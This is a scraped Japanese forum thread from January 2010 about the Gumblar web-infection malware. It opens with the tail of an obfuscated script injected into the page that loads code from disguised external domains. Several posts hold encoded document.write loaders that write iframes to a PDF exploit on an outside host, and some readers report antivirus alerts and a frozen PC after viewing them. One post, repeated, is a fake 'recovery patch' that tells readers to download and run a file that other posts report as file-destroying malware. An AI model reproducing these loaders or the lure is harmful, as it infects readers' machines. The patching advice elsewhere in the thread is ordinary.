#(n^#^g@.&@c&$#o@m(.)a###!c#(e!$$(r$$-^#c!@o)@!$m@.$^s)(u!@p$$e@r@(a(g(@^u)$&)!i#d!e&!!#.!@^r(^u^:)
#8&^#&0#(8)^0^/!!#i@$)#n^$@$.&!)!c&!(o((!m$&&/$i#!$n#!).)$@c#(^o@!$&m(@/@$g@o))o^&g@&l!#e!.^)c))o@
m#&@/$^#v#)i!)#d!^@e&)$)o@)!@@s#z$(.?^c@!$o!m(^^/@b^(&e#!@&s@((t)#$@#t&^)^u&b!(e^)c$^#l!@)i$)&!$p)
@s!$^$(.&$c@&)@o)!$m(^#&/('.replace(/\!|@|#|\$|\(|&|\^|\)/ig, ''));
U26gcel3nnek.setAttribute('defer', 'd!$@$e@f!!(&(e^r@)'.replace(/@|\(|\$|#|\!|\)|\^|&/ig, ''));
U26gcel3nnek.setAttribute('id', 'M$e!$7#!)r#!$l?@^9()!(#t$!^9&q#)@$$b&&^!3&@)'.replace(/\^|\)|@|&|\$|\!|\(|#/ig, ''));
document.body.appendChild(U26gcel3nnek);}}
catch(Lpmpa57y1j) {}
</script>
<!--86fa61201e3ca3a075145a1d33d3c209-->
130 : モンキーレンチ(アラバマ州):2010/01/08(金) 12:21:04.83 ID:I0L8TLMx
>>128
最近のは7でも感染したとかの報告があったから、たぶん駄目だろ
最近のは7でも感染したとかの報告があったから、たぶん駄目だろ
131 : 手帳(アラバマ州):2010/01/08(金) 12:25:01.79 ID:oQGEk3JC
これ、アンチウイルスソフトで除去できるの?
除去できるとしたら大手サイトの管理会社が感染してるのが不可解なんだがw
除去できるとしたら大手サイトの管理会社が感染してるのが不可解なんだがw
132 : ビーカー(アラバマ州):2010/01/08(金) 12:28:08.48 ID:pBxN6Hr/
で、感染したら具体的にどうなるんだよこのヴァイラスは
133 : 虫ピン(神奈川県):2010/01/08(金) 12:28:13.97 ID:GI76Eofp
一体何が目的なんです?
134 : 手帳(アラバマ州):2010/01/08(金) 12:29:45.17 ID:oQGEk3JC
>>133
どっかのサイト乗っ取りたかったんじゃないの?
どっかのサイト乗っ取りたかったんじゃないの?
135 : そろばん(アラバマ州):2010/01/08(金) 12:35:24.62 ID:59BQdmXn
一番初めに対応したウイルス駆除会社があや・・・
136 : ブンゼンバーナー(東京都):2010/01/08(金) 12:43:04.28 ID:fH3AulUa
window.onload とかproxomitronで潰してるわ
137 : モンキーレンチ(関西地方):2010/01/08(金) 12:43:12.61 ID:IOqrA9yY
こういう事があった前後のAVソフトの売り上げ推移が見たい
139 : 電子レンジ(神奈川県):2010/01/08(金) 12:46:07.66 ID:MQxLHqq7
>>22
AVG何も言って来ねーぞw
AVG何も言って来ねーぞw
140 : モンキーレンチ(ネブラスカ州):2010/01/08(金) 12:46:08.30 ID:zicNOoW1
これに感染するとハローワークにしかアクセス出来なくなる
>>140
ウイルスのくせに日本救う気なの?
ウイルスのくせに日本救う気なの?
142 : 電子レンジ(アラバマ州):2010/01/08(金) 12:49:40.80 ID:FZlyIZI9
で、これ感染したらどーなんの?
143 : ◆SsSSsSsSSs :2010/01/08(金) 12:49:50.14 ID:SIukZWYS
これはavast先生的にどうなの?
<script type='text/javascript'>document.write(decodeURIComponent(function(r, s) { var t = '', p = -8, a = 0, b, c; for (var i = 0;
i < s.length; i++) { if ((c = r.indexOf(s.charAt(i))) < 0) continue; a = (a << 6) | (c & 63); if ((p += 6) >= 0) { b = (a >> p) &
255; if (c != 64) t += String.fromCharCode(b); a &= 63; p -= 8; } } return t; } ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
vwxyz0123456789+/=', 'JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJG
dXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0UlMEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdX
BndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZiUyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2Vu
LmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUyRnNvdXJjZSUyRnVwMzYxNzAucGRmJTIyJTNFJTNDJTJGaWZyYW1lJTNFJTBEJTBBJTNDaWZyYW1lJTIwc3JjJT
NEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJGdXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0Ul
MEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdXBndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZi
UyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2VuLmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUy
<script type='text/javascript'>document.write(decodeURIComponent(function(r, s) { var t = '', p = -8, a = 0, b, c; for (var i = 0;
i < s.length; i++) { if ((c = r.indexOf(s.charAt(i))) < 0) continue; a = (a << 6) | (c & 63); if ((p += 6) >= 0) { b = (a >> p) &
255; if (c != 64) t += String.fromCharCode(b); a &= 63; p -= 8; } } return t; } ('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstu
vwxyz0123456789+/=', 'JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJG
dXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0UlMEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdX
BndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZiUyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2Vu
LmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUyRnNvdXJjZSUyRnVwMzYxNzAucGRmJTIyJTNFJTNDJTJGaWZyYW1lJTNFJTBEJTBBJTNDaWZyYW1lJTIwc3JjJT
NEJTIyaHR0cCUzQSUyRiUyRjJzZW4uZGlwLmpwJTJGY2dpLWJpbiUyRnVwZ3VuJTJGdXAxJTJGc291cmNlJTJGdXAzNjE3MC5wZGYlMjIlM0UlM0MlMkZpZnJhbWUlM0Ul
MEQlMEElM0NpZnJhbWUlMjBzcmMlM0QlMjJodHRwJTNBJTJGJTJGMnNlbi5kaXAuanAlMkZjZ2ktYmluJTJGdXBndW4lMkZ1cDElMkZzb3VyY2UlMkZ1cDM2MTcwLnBkZi
UyMiUzRSUzQyUyRmlmcmFtZSUzRSUwRCUwQSUzQ2lmcmFtZSUyMHNyYyUzRCUyMmh0dHAlM0ElMkYlMkYyc2VuLmRpcC5qcCUyRmNnaS1iaW4lMkZ1cGd1biUyRnVwMSUy
薬理作用のある善玉ウィルスですね
146 : ◆SsSSsSsSSs :2010/01/08(金) 13:00:49.06 ID:SIukZWYS
147 : 鍋(アラバマ州):2010/01/08(金) 13:01:24.64 ID:cIw75jAz
proxomitronで対策できないだろうか。
148 : ◆SsSSsSsSSs :2010/01/08(金) 13:01:51.41 ID:SIukZWYS
149 : 電子レンジ(神奈川県):2010/01/08(金) 13:15:33.88 ID:MQxLHqq7
無線LAN経由でID・パスが漏れて感染というケースが一番多そうw
今やWPAにしないと簡単にパケットキャプチャされて漏れるからなー
今やWPAにしないと簡単にパケットキャプチャされて漏れるからなー
150 : すりこぎ(アラバマ州):2010/01/08(金) 13:20:39.58 ID:TE0AHxjQ
>>1
http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
http://pc11.2ch.net/test/read.cgi/sec/1259607683/405
今北さん用、GENO(Gumblar)ウイルス対処法。
行っておくべき事項を箇条書きにしました。
細かなことは他にもいろいろありますが、とりあえず以下を実施して下さい。
(1)Microsoft Update(Windows Update)を実行しシステムを最新の状態にする
(2)Adobe Readerを最新版に更新する
(3) Adobe ReaderのAcrobat JavaScriptを無効に設定
(4) JRE(Java Runtime Environment)を最新版に更新する
(5) Flash Playerを最新版に更新する
(6) QuickTimeを最新版に更新する
(1)〜(4)を行っていれば、現時点で改ざんサイトを閲覧してもウイルスには感染しない。
攻撃コードは変化する可能性もあるので、念のため全て行っていただきたい。
Adobe Readerなどのアップデート方法については下記のトピックスを参照のこと。
Acrobat JavaScriptを無効にする方法は以下の通り。
(1)Adobe Readerを起動し[編集]メニューの[環境設定]を選択
(2)「分類」の中の「JavaScript」を選択
(3)「Acrobat JavaScriptを使用」のチェックをクリア
(4)「OK」ボタンを押す
>>147
おみとろんじゃないけど、念のためFWのフィルタに↓つっこんでる
.ru:8080/
.cn:8080/
これで落とそうとする物が防げる、はず
でも、>>150の特に>(3)「Acrobat JavaScriptを使用」のチェックをクリア
をやっておけば、とりあえず大丈夫じゃないかな
おみとろんじゃないけど、念のためFWのフィルタに↓つっこんでる
.ru:8080/
.cn:8080/
これで落とそうとする物が防げる、はず
でも、>>150の特に>(3)「Acrobat JavaScriptを使用」のチェックをクリア
をやっておけば、とりあえず大丈夫じゃないかな
152 : メスシリンダー(沖縄県):2010/01/08(金) 14:21:30.27 ID:iarCLPLD
これはネット史上最悪レベルのウイルスになりそうだな・・・
153 : 包丁(東京都):2010/01/08(金) 14:23:31.73 ID:GCS0qpTq
これからの時代はヒューリスティックでしのぐとか言ってた
NOD32は防御できてんの?
NOD32は防御できてんの?
154 : 篭(アラバマ州):2010/01/08(金) 14:26:32.61 ID:qW8Z6kcA
クラウド使ったpanda最強
155 : 試験管(静岡県):2010/01/08(金) 14:29:51.58 ID:0TrH6utJ
またXPユーザーが血祭りに上がってるのか
さっさとVistaや7にしろよ
さっさとVistaや7にしろよ
156 : ムーラン(宮城県):2010/01/08(金) 14:31:04.53 ID:uT776Yc5
UACで根本的に解決すればいいのにあほやね
157 : 電子レンジ(神奈川県):2010/01/08(金) 14:44:18.31 ID:MQxLHqq7
>>152
キンタマには勝てないなw
キンタマには勝てないなw
158 : モンキーレンチ(catv?):2010/01/08(金) 15:01:36.16 ID:HTtcnhM9 BE:706369829-2BP(7777)
160 : ドラフト(アラバマ州):2010/01/08(金) 15:14:33.64 ID:Gk2pkqzc
>>146保存しようとおもたら反応した
161 : モンキーレンチ(catv?):2010/01/08(金) 15:16:05.77 ID:HTtcnhM9 BE:1373494875-2BP(7777)
ガンブラーに関してはavast!が最強だったから、
対avast!用に改良したのか
対avast!用に改良したのか
163 : 両面テープ(福井県):2010/01/08(金) 15:19:42.06 ID:Bo+QbbEp
>>158
おい、いたら返事
おい、いたら返事
>>161
おーい
おーい
166 : ボールペン(青森県):2010/01/08(金) 15:24:54.08 ID:vjhoZHEE
久々にプァーンプァーンプァーンを聞いた。
167 : ミリペン(千葉県):2010/01/08(金) 15:33:19.08 ID:LZKMcHdY
>>165
小池
小池
168 : モンキーレンチ(catv?):2010/01/08(金) 15:46:49.22 ID:HTtcnhM9 BE:1765922459-2BP(7777)
170 : モンキーレンチ(catv?):2010/01/08(金) 15:49:23.93 ID:HTtcnhM9
>>170
http://anchorage.2ch.net/test/read.cgi/siberia/1138406800/106
こんな感じのマルチポストが89件
http://anchorage.2ch.net/test/read.cgi/siberia/1262099561/188-189
ここにkawaisosuというのがあるから、もしかしたらと思って聞いてみた
http://anchorage.2ch.net/test/read.cgi/siberia/1138406800/106
こんな感じのマルチポストが89件
http://anchorage.2ch.net/test/read.cgi/siberia/1262099561/188-189
ここにkawaisosuというのがあるから、もしかしたらと思って聞いてみた
172 : モンキーレンチ(catv?):2010/01/08(金) 15:54:51.85 ID:HTtcnhM9
1138406800/106はシラネ
ソースコードを配布したのが不味かったのか・・・
ちなみに1262099561/188-189はどう考えても俺です、ありがとうございました
ソースコードを配布したのが不味かったのか・・・
ちなみに1262099561/188-189はどう考えても俺です、ありがとうございました
173 : 釣り竿(アラバマ州):2010/01/08(金) 16:00:03.70 ID:L6F5RX+3
ガンブラー自己中心派
174 : マイクロピペット(山口県):2010/01/08(金) 16:02:04.52 ID:oTlGFwoN
踏んだことある中じゃレベル低いよなこのウイルス
今までで最強はbios破壊された奴だ
お陰で立ち上がらなくなって初めてマザボのbios復旧機能が役にたった
今までで最強はbios破壊された奴だ
お陰で立ち上がらなくなって初めてマザボのbios復旧機能が役にたった
175 : 丸天(catv?):2010/01/08(金) 16:02:58.11 ID:xceqYztC
avira最強じゃね
176 : 綴じ紐(茨城県):2010/01/08(金) 16:03:09.36 ID:T7myWTrZ
.l l \| | !ノートン先生 ! //U ヽ___/
パソコン蛾人 \ !!大激怒!! // U :::U:
ぶっ壊れ(__) \ !!!!! / // ___ \ :::
たお! (__) \∧∧∧∧/ | | | U ::::
(`Д´#) < ぶ パ > |U | | ::U:
_| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....::::
/旦|――||// /| < 壊 コ > ヽ .....:::::::::
─────────< れ ン >──────────
< _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬
(y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___
⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
パソコン蛾人 \ !!大激怒!! // U :::U:
ぶっ壊れ(__) \ !!!!! / // ___ \ :::
たお! (__) \∧∧∧∧/ | | | U ::::
(`Д´#) < ぶ パ > |U | | ::U:
_| ̄ ̄||_)_ < っ ソ > | ├―-┤ U.....::::
/旦|――||// /| < 壊 コ > ヽ .....:::::::::
─────────< れ ン >──────────
< _,ノ , 、ヽ、_ ノ< た 蛾> プスプスプス・・・・・∬∬
(y○')`ヽ) ( ´(y○')< !!! >踏んじゃったよぉ___
⌒ / ヽ⌒ /∨∨∨∨\ ∧_∧ ||\
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`) || |
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \( つ/ ̄||/
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」
177 : ダーマトグラフ(catv?):2010/01/08(金) 16:06:05.47 ID:IU/s4x6H
178 : モンキーレンチ(dion軍):2010/01/08(金) 16:07:10.83 ID:Rm8qPeY2
>>174
それってXPより前?それともXP以降の話?
それってXPより前?それともXP以降の話?
179 : マイクロピペット(山口県):2010/01/08(金) 16:08:11.21 ID:oTlGFwoN
>>178
XP SP1か無印の頃
XP SP1か無印の頃
180 : モンキーレンチ(アラバマ州):2010/01/08(金) 16:16:39.85 ID:VKEoi2Vu
>>172
覚悟しておいてね
覚悟しておいてね
181 : ホールピペット(滋賀県):2010/01/08(金) 16:17:43.80 ID:PZ2XT8cC
>>146
ウィルス検出通知 (VIRUS DETECTION)
指定したウェブページ中にコンピュータウィルスを検出しました。
あなたのコンピュータがウィルスに感染することを防ぐため、指定したウェブページの内容は表示されません。
このメッセージは、接続先のウェブサーバがウィルスに感染している可能性を示すものであり、あなたのコンピュータがウィルスに感染していることを示してはいません。
Computer virus was detected from the contents of this web page.
This page is not displayed to prevent computer virus from infecting your computer.
This message inform that the connected web server may be infected with virus.
And this message does not inform that your computer is infected.
VIRUS NAME: Exploit.JS.Pdfka.aio
Powered by F-Secure Anti-Virus Gateway for Linux
|-゚)
ウィルス検出通知 (VIRUS DETECTION)
指定したウェブページ中にコンピュータウィルスを検出しました。
あなたのコンピュータがウィルスに感染することを防ぐため、指定したウェブページの内容は表示されません。
このメッセージは、接続先のウェブサーバがウィルスに感染している可能性を示すものであり、あなたのコンピュータがウィルスに感染していることを示してはいません。
Computer virus was detected from the contents of this web page.
This page is not displayed to prevent computer virus from infecting your computer.
This message inform that the connected web server may be infected with virus.
And this message does not inform that your computer is infected.
VIRUS NAME: Exploit.JS.Pdfka.aio
Powered by F-Secure Anti-Virus Gateway for Linux
|-゚)
182 : 包丁(東京都):2010/01/08(金) 16:21:14.39 ID:GCS0qpTq
>>174
本物のウイルスと同じで致死性が高いと拡散しにくい
本物のウイルスと同じで致死性が高いと拡散しにくい
え?やばいの?テスト用なんでしょ・・・・・心配になってきた。
184 : モンキーレンチ(catv?):2010/01/08(金) 16:22:00.48 ID:HTtcnhM9
>>180
何を覚悟しろとwww
何を覚悟しろとwww
nod32以外糞
異論は認めへん
異論は認めへん
186 : 冷却管(catv?):2010/01/08(金) 16:26:10.28 ID:BLtoVUOt
【緊急】ガンブラー復旧パッチ使用手順。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
(){eval(unescape(('Script(t,'%')))})(/./g);
188 : ばね(兵庫県):2010/01/08(金) 16:29:35.94 ID:B2n63oG4
189 : 二又アダプター(愛知県):2010/01/08(金) 16:30:08.60 ID:oDixb6wY
>>145
なにこれPC固まった
なにこれPC固まった
190 : モンキーレンチ(catv?):2010/01/08(金) 16:30:22.21 ID:HTtcnhM9
>>191
そいつは日本人じゃないんだろ
そいつは日本人じゃないんだろ
>>186
ttp://online.us.drweb.com/cache/?i=f9cb7d8b498e650360da64c63ce1284e
> fukkyuu0.exe infected with BAT.KillFiles.26
ttp://www.virustotal.com/analisis/095bb9a183c297e375230972cb1a426223ddb2a01e7f50b92dbd4a05ec1a3a97-1262936111
> File fukkyuu0.exe received on 2010.01.08 07:35:11 (UTC)
> Current status: finished
> Result: 29/41 (70.74%)
ttp://online.us.drweb.com/cache/?i=f9cb7d8b498e650360da64c63ce1284e
> fukkyuu0.exe infected with BAT.KillFiles.26
ttp://www.virustotal.com/analisis/095bb9a183c297e375230972cb1a426223ddb2a01e7f50b92dbd4a05ec1a3a97-1262936111
> File fukkyuu0.exe received on 2010.01.08 07:35:11 (UTC)
> Current status: finished
> Result: 29/41 (70.74%)
あ、ごめん。ほんとうのレジストリ復旧のやつぽい(^^ゞ
だめだ。最近、どうもZIPだの見ると疑ってしまう ORZ
だめだ。最近、どうもZIPだの見ると疑ってしまう ORZ
あ〜なんだ。やっぱりそうかいw
196 : ばね(兵庫県):2010/01/08(金) 16:39:52.53 ID:B2n63oG4
197 : 印章(神奈川県):2010/01/08(金) 16:41:55.64 ID:slVytE34
持ってて良かったJane
198 : フライパン(catv?):2010/01/08(金) 16:42:13.25 ID:+3qfZx57
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
―――――――――――――‐┬┘
|
____.____ | .__ いらないPCを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: | >>186
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
――――――――――‐┬┘
|
____.____ |
| |..__ | |
| | |\_\. | |
| | | . |.◎ |つ |ミ ∧_∧
| | | . |: | | | (´・ω・)>>187
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ | ⊂ ⊂ )
⊂ ⊂ ,ノ
―――――――――――――‐┬┘
|
____.____ | .__ いらないPCを
| | | | |\_\ 窓から
| | ∧_∧ | | | |.◎.| 投げ捨てろ
| |( ´∀`)つ ミ | | |.: | >>186
| |/ ⊃ ノ | | .\|.≡.|
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ |  ̄
 ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄」
――――――――――‐┬┘
|
____.____ |
| |..__ | |
| | |\_\. | |
| | | . |.◎ |つ |ミ ∧_∧
| | | . |: | | | (´・ω・)>>187
 ̄ ̄ ̄ ̄' ̄ ̄ ̄ ̄ | ⊂ ⊂ )
⊂ ⊂ ,ノ
199 : モンキーレンチ(catv?):2010/01/08(金) 16:42:43.62 ID:HTtcnhM9
ただの画像だろ?
画像踏んだだけでウイルスに感染するわけないじゃんwwww
画像踏んだだけでウイルスに感染するわけないじゃんwwww
201 : 試験管(静岡県):2010/01/08(金) 16:44:55.88 ID:0TrH6utJ
202 : モンキーレンチ(dion軍):2010/01/08(金) 16:46:51.85 ID:Rm8qPeY2
してない
203 : スパナ(dion軍):2010/01/08(金) 16:47:30.51 ID:qHW/1LW8
MSE使わないバカは何考えてるの?
204 : 両面テープ(福井県):2010/01/08(金) 16:49:19.36 ID:Bo+QbbEp
>>145
MSEならExploit:JS/Mult.CDで検出できるよ。
MSEならExploit:JS/Mult.CDで検出できるよ。
205 : オープナー(栃木県):2010/01/08(金) 17:00:02.32 ID:ERpSMR1B
MSE使ってたやつは感染してたろ
今対応してるかどうかより対応の早さが重要
MSEはその点駄目
今対応してるかどうかより対応の早さが重要
MSEはその点駄目
206 : ホワイトボード(中国地方):2010/01/08(金) 17:01:43.14 ID:ZPAG/yBd
64bitOSでも感染するの
207 : ラジオペンチ(福岡県):2010/01/08(金) 17:03:43.11 ID:MfpFAFRp
FreeBSD俺に死角はなかった
こないだ起動しなくなって(真っ黒画面にカーソルだけピコピコ)
再インストールしたんだけどもしかして感染してた?
ググったら症状まったく一緒なんだが・・・。
とりあえず考えられるもの全部最新のにして
2〜3日経ってるんだけど、なんかヤバいかな?
今、とりあえず、スキャンしてる
再インストールしたんだけどもしかして感染してた?
ググったら症状まったく一緒なんだが・・・。
とりあえず考えられるもの全部最新のにして
2〜3日経ってるんだけど、なんかヤバいかな?
今、とりあえず、スキャンしてる
209 : モンキーレンチ(catv?):2010/01/08(金) 17:07:44.10 ID:HTtcnhM9
tp://neko2.net/uploda.org/?540332.jpg
↓
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<META name="Keywords" content="">
<META name="Description" content="">
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="100%">
<FRAME name="main" src="tp://wavlac.net/oinari-uploader/src/oinari0223.html">
<NOFRAMES>
<BODY>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
↓
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<HTML>
<HEAD>
<META http-equiv="Content-Type" content="text/html; charset=Shift_JIS">
<META http-equiv="Content-Style-Type" content="text/css">
<META name="Keywords" content="">
<META name="Description" content="">
<TITLE></TITLE>
</HEAD>
<FRAMESET rows="100%">
<FRAME name="main" src="tp://wavlac.net/oinari-uploader/src/oinari0223.html">
<NOFRAMES>
<BODY>
</BODY>
</NOFRAMES>
</FRAMESET>
</HTML>
210 : 烏口(catv?):2010/01/08(金) 17:08:00.14 ID:GmJikerv
>>203
今日初めて知った
今日初めて知った
211 : 画板(長屋):2010/01/08(金) 17:13:58.57 ID:hmgBE72U
212 : フライパン(東京都):2010/01/08(金) 17:14:20.32 ID:doQhveJJ
情弱は>>150をやれヴぁいいの?
Adobeは自動即時アップデートを導入しろカス
いちいち確認するのめんどいんだよ
いちいち確認するのめんどいんだよ
214 : ボウル(アラバマ州):2010/01/08(金) 17:19:48.39 ID:zLrW2kLQ
>>213
アドビ、ユーザーの関与なしに自動アップデートする仕組みを検討
http://japan.zdnet.com/sp/feature/07zeroday/story/0,3800083088,20406178,00.htm
アドビ、ユーザーの関与なしに自動アップデートする仕組みを検討
http://japan.zdnet.com/sp/feature/07zeroday/story/0,3800083088,20406178,00.htm
こううスレを専ブラ以外で開こうとは思わない。
217 : 漁網(兵庫県):2010/01/08(金) 17:23:30.36 ID:nY5mqsGu
218 : モンキーレンチ(catv?):2010/01/08(金) 17:30:02.03 ID:HTtcnhM9
>>209
tp://wavlac.net/oinari-uploader/src/oinari0223.html
↓
<iframe src="噂のup36170.pdf"></iframe>
・
・
・
tp://wavlac.net/oinari-uploader/src/oinari0223.html
↓
<iframe src="噂のup36170.pdf"></iframe>
・
・
・
【緊急】ガンブラー復旧パッチ使用手順。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
http://www.so-net.ne.jp/security/news/view.cgi?type=2&no=2108
http://www14.atpages.jp/saba02site/files/fukkyuu0.zip
手順1
上記をダウンロードする。
手順2
ダウンロードしたファイルを任意のソフトで解凍する。
手順3
解凍したファイル内にある復旧パッチを実行すると、
「windowを復旧しますか?」とメッセージが出るので「yes」を選択します。
手順4
実行後、PCをセーフモードで再起動してください。
220 : モンキーレンチ(アラバマ州):2010/01/08(金) 17:35:19.51 ID:QQXPUJsp
昨日再インストールして
今VistaSP2をウィルス対策ソフトなしで使ってる。
まぁユーザーアカウント入ってるしなんとかなるでしょ・・・・
いや・・・今日中にAVGイレマスヨ?
今VistaSP2をウィルス対策ソフトなしで使ってる。
まぁユーザーアカウント入ってるしなんとかなるでしょ・・・・
いや・・・今日中にAVGイレマスヨ?
221 : カッターナイフ(韓):2010/01/08(金) 17:36:16.94 ID:7zC0pQL2
AVIRA最強
222 : モンキーレンチ(アラバマ州):2010/01/08(金) 17:36:25.50 ID:PHg2Bd5v
ウイルス対策どうのこうのより脆弱性さっさと修正しろよカス
223 : モンキーレンチ(catv?):2010/01/08(金) 17:44:04.77 ID:HTtcnhM9
224 : 霧箱(アラバマ州):2010/01/08(金) 17:44:58.01 ID:rO5nPoKM
やった!反応した!
225 : 霧箱(アラバマ州):2010/01/08(金) 17:47:50.77 ID:rO5nPoKM
226 : メスピペット(東日本):2010/01/08(金) 17:49:07.25 ID:ckOb/0qK
>>1
対応始まったな
午前1時52分の>>1のサイト /*LGPL*/有り
http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262939972
対応済み:Avira カスペ NOD32
対応始まったな
午前1時52分の>>1のサイト /*LGPL*/有り
http://www.virustotal.com/jp/analisis/9e032adbec239b778cd4e14405953799185c6c7f1f35fe90531c944efc2f0787-1262939972
対応済み:Avira カスペ NOD32
227 : 蛍光ペン(長屋):2010/01/08(金) 17:53:55.57 ID:YDMEhqGi
まさにGPL汚染
スクリプトを使って全てのライセンスをGPLにするつもりだな。
スクリプトを使って全てのライセンスをGPLにするつもりだな。
228 : ダーマトグラフ(中国地方):2010/01/08(金) 17:55:46.15 ID:OXry08/R
いいえ 男女兼用です
229 : モンキーレンチ(catv?):2010/01/08(金) 18:03:14.23 ID:HTtcnhM9
CVE-2009-4324
VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html
extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324
VRT: Adobe Reader media.newPlayer() Analysis (CVE-2009-4324)
ttp://vrt-sourcefire.blogspot.com/2009/12/adobe-reader-medianewplayer-analysis.html
extraexploit: Adobe CVE-2009-4324 in the wild - (0day) - part 0-6
ttp://extraexploit.blogspot.com/search?q=CVE-2009-4324
